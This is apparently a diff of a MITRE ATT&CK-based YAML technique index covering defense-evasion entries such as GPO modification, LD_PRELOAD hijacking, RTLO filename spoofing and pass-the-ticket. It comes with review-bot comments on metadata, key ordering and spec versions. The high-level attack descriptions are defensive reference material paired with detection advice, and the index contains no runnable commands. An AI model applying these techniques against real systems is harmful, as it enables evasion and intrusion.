+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
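Review bot: `spec_version: '2.1'` is removed here and from every other object in this patch while `x_mitre_attack_spec_version` is kept or bumped; `spec_version` is a required property on STIX 2.1 objects, so if this YAML is ever converted back into STIX or validated with a STIX library the objects will fail validation. Either keep the key or state in the generator's documentation that the file is no longer meant to be STIX-conformant.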
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
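Review bot: for T1218.008 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and adds nothing in its place, and the other hunk for this object (6369/6494) touches only `modified`, so the object is left with no attack spec version at all; the same pattern recurs for T1055.013, T1574.005, T1036.002, T1542.002, T1055.004, T1600.002, T1055.002 and T1218.005, whereas T1078.001, T1578.003 and T1497 keep the key and bump it to 3.2.0. Check whether the upstream objects genuinely lack the field or the export dropped it, and in the latter case restore `x_mitre_attack_spec_version` before merging.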
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
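Review bot: the key reordering in this hunk (platforms, domains, type/id/created and external_references moved from the top of T1578.003 to the bottom) accounts for most of the diff and buries the substantive changes: the contributor line `- Arun Seelagan, CISA`, `revoked: false`, the Mandiant M-Trends URL switching from content.fireeye.com to a mandiant.com PDF, `x_mitre_permissions_required` dropped, and the spec version bumped to 3.2.0. Emit keys in a stable order from the generator so bundle refreshes produce reviewable diffs, and confirm no consumer reads `x_mitre_permissions_required`, since it is removed here without replacement.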
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
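Review bot: the new description string for T1562.007 ends with a trailing space inside the closing quote (`T1499). "`), which will surface as trailing whitespace wherever the description is rendered; strip it. The rest is upstream text that adds the "with appropriate permissions" qualifier, control-plane-to-data-plane lateral movement, creation of new security groups, and the Brute Force and Endpoint Denial of Service cross-references, all of which the unchanged `x_mitre_detection` line (monitor creation or modification of security groups and firewall rules) still covers.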
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
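Review bot: the only substantive changes in this block are the GentilKiwi Pass the Ticket entry moving to a web.archive.org snapshot with its retrieved date updated to September 12, 2024, `revoked: false`, and the spec version bump to 3.2.0 with `x_mitre_modified_by_ref` re-added after being removed in the 7116/7233 hunk; the remaining lines are the ADSecurity, CERT-EU and GentilKiwi entries being reordered, which makes the diff hard to review. Preserve or sort external_references order in the generator, and treat the archived URL as the pattern for other blog references that have no snapshot.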
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
